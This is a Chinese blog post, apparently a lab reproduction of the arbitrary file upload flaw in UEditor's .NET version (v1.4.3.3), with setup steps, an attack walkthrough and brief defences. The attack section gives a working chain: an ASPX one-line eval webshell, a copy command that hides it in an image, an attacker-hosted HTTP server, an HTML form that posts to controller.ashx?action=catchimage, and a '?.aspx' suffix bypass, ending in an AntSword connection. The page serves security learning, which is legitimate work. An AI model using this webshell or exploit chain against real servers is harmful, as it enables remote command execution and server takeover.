Ueditor编辑器任意文件上传漏洞

已于 2022-07-30 20:54:04 修改
阅读量1.7w 收藏 22
点赞数 3
分类专栏: 从0到1学习Web安全 文章标签: 编辑器 服务器 .net web安全
于 2022-07-30 20:46:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51468027/article/details/126077427
版权

一、漏洞描述

UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。

二、影响范围

该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。

三、漏洞原理

漏洞的成因是在获取图片资源时仅检查了Content-Type,导致可以绕过达到任意文件上传。具体的漏洞分析可参考:https://www.freebuf.com/vuls/181814.html

四、漏洞复现

1、环境部署

准备一台Windows Server服务器,我用的是Windows 2008 Server。

没有安装.NET Framework 4.0的要先安装:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718

安装完 .NET Framework 4.0 后,还需要向 IIS 注册应用程序池,注册的方法是,使用管理员权限打开命令提示符(CMD),输入以下命令:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i

安装完毕后,在 IIS 管理器刷新就能看到 4.0 的应用程序池。

img

https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下载utf8的.net版本

img

右键 网站–添加网站,选择下载的Ueditor目录, 选择版本为 4.0 的应用程序池;点击连接为,设置特定用户,该特定用户为主机上存在的用户例如administrator

img

img

此时访问127.0.0.1:8080已经有Ueditor的界面了

img

代码要求以应用程序的形式来运行(可以方便加入库依赖和组织代码)。所以需要把 net 目录转换为应用程序;点击连接为,设置特定用户,该特定用户为主机上存在的用户例如administrator

img

img

访问net/controller.ashx 控制器文件,出现以下界面说明编辑器应用程序运行成功,且漏洞存在,到此配置完毕。

img

如果配置过程中访问页面显示权限不够的报错,那么右键部署项目的文件夹,选择属性,选择安全,增加Everyone用户,将该用户的权限设置为完全控制,点击确定,重新部署即可。

img

2、攻击流程

访问http://ip:port/net/controller.ashx 控制器文件。当出现下图的时候表示漏洞存在

img

准备一个aspx一句话木马

<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>

制作图片马

copy w01ke.jpg /b + shell.aspx /a ueditor.jpg

img

准备一台服务器存放图片马或者需要上传的文件,将做好的ueditor.jpg图片马上传到我们的服务器,并开启下载服务(HTTP)

python -m SimpleHTTPServer 8080

img

制作一个HTML。因为不是上传漏洞所以enctype 不需要指定为multipart/form-data。

<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

其中http://xx.com 为需要测试的网站地址,action后填写路径为实际中遇到的路径,不要太死板,如果太死板不按网站的实际路径来就会出现路径找不到的错误

打开我们做好的HTML,shell addr 处填写服务器上图片马地址,构造成以下格式,绕过上传使其解析为 aspx

http://xxxx/ueditor.jpg?.aspx

img

点击submit,直接显示无效URL

img

经过排查,发现不能用Python开启web的方式,貌似只能用域名的形式(我不确定),我只好把我的图片马上传至云服务器,然后修改访问域名即可成功,同时回显了木马路径

img

使用蚁剑连接:

img

五、防御措施

  1. 修改CrawlerHandler.cs 增加对文件扩展名的;
  2. IPS等防御产品可以加入相应的特征
w01ke
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UEditor 1.4.3net漏洞 修补
哈哈哈的博客
03-08 379
在 CrawlerHandler.cs 类里面修改 public Crawler Fetch() 方法,并添加文件类型的验证。State = "文件格式错误!在config.json文件中添加要限定的文件名称。] /* 列出的文件类型 */// 新增格式的验证。
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1445
漏洞影响UEditor.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET
UEditor编辑器两个版本任意文件上传漏洞分析
ahhacker86的专栏
01-25 1780
UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 4980
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zz12345600354的博客
04-26 599
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
挖洞经验|UEditor编辑器存储型XSS漏洞
MachineGunJoe666
05-29 3145
前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞,此漏洞已经上报,由于技术略菜,有分析不到位的还请多多见谅。 漏洞成因分析 漏洞文件产生在前端配置文件ueditor.config.js: 以下为纯文本粘贴为true时的过滤规则,对一些危险的标签没有做过滤,怪不得好多二次开发的。 //纯文本粘贴模式下的过滤规则 //'filterT
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 5905
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 4578
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
UEditor 任意文件上传漏洞
chennannanlucky的博客
07-08 2071
UEditor 任意文件上传漏洞
【技术分享】ueditor漏洞利用&源码分析超详细分析
A1_3_9_7的博客
03-15 1033
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
百度编辑器UEditor v1.4.3 PHP版 GBK
05-10
UEditor1.4.3更新说明修复hasContents接口在非ie下只有空格时判断还为真的问题 修复在粘贴word内容时,会误命中cm,pt这样的文本内容变成px的问题 优化删除编辑器再创建编辑器时,编辑器的容器id发生变化的问题 修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config.js里 修复图片拉伸工具和编辑拉伸长高器的样式冲突 修复文字的unicod
UEditor编辑器兼容音频上传
01-04
UEditor 是一套开源的在线HTML编辑器UEditor编辑器增加了音频独立上传功能,下载后直接放到自己项目的静态资源目录下即可
UEditor 编辑器跨域上传解决方法
10-27
在使用 UEditor 编辑器 时遇到了跨域的问题,导致无法发图片,原因是由于 iframe 中的 src 跨域造成的
关于UEditor编辑器远程图片上传失败的解决办法
10-27
在本文中,我们将深入探讨当UEditor编辑器遇到远程图片上传失败的问题时,如何进行解决。 首先,远程图片上传是UEditor的一个重要特性,它允许用户复制包含远程图片的文本并自动抓取图片,以便在本地存储,确保即使...
百度ueditor编辑器.zip
04-23
百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器百度ueditor编辑器
UEditor漏洞
热门推荐
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器
ueditor php 漏洞_【奇思淫技】TP5最新getshell漏洞
weixin_39801714的博客
11-25 2903
ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。0X00 基本环境确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。基本环境为:p...
UMeditor
水滴石穿!学习小积累!
01-07 252
UMeditor,简称UM,是为满足广大门户网站对于简单发帖框,或者回复框需求所定制的在线富文本编辑器。 UM的主要特点就是容量和加载速度上的改变,主文件的代码量为139k,而且放弃了使用传统的iframe模式,采用了div的加载方式, 以达到更快的加载速度和零加载失败率。现在UM的第一个使用者是百度贴吧,贴吧每天几亿的pv是对UM各种指标的最好测试平台。 当然随着代码的减少,UM的功能对于UE...
UEditor编辑器任意文件上传
08-31
UEditor编辑器存在一个高危漏洞,即在抓取远程数据源时未对文件后缀名做验证,导致任意文件写入漏洞。黑客可以利用这个漏洞,在服务器上执行任意指令。这个漏洞只影响.NET版本的UEditor,其他版本暂时不受影响。 为了利用这个漏洞,黑客可以在UEditor编辑器中的shell地址处填写服务器上的图片马地址,构造成特定格式。例如,在URL中将图片马地址后缀更改为.aspx,绕过上传使其解析为aspx文件,从而达到任意文件上传的目的。 为了防止这个漏洞被利用,建议开发者及时更新UEditor编辑器的最新版本,并确保在抓取远程数据源时对文件后缀名进行验证。此外,也可以限制用户上传的文件类型和大小,加强服务器安全配置,以减少潜在的风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Ueditor编辑器任意文件上传漏洞](https://blog.csdn.net/m0_51468027/article/details/126077427)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Django集成百度富文本编辑器uEditor攻略](https://download.csdn.net/download/weixin_38613154/14865210)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值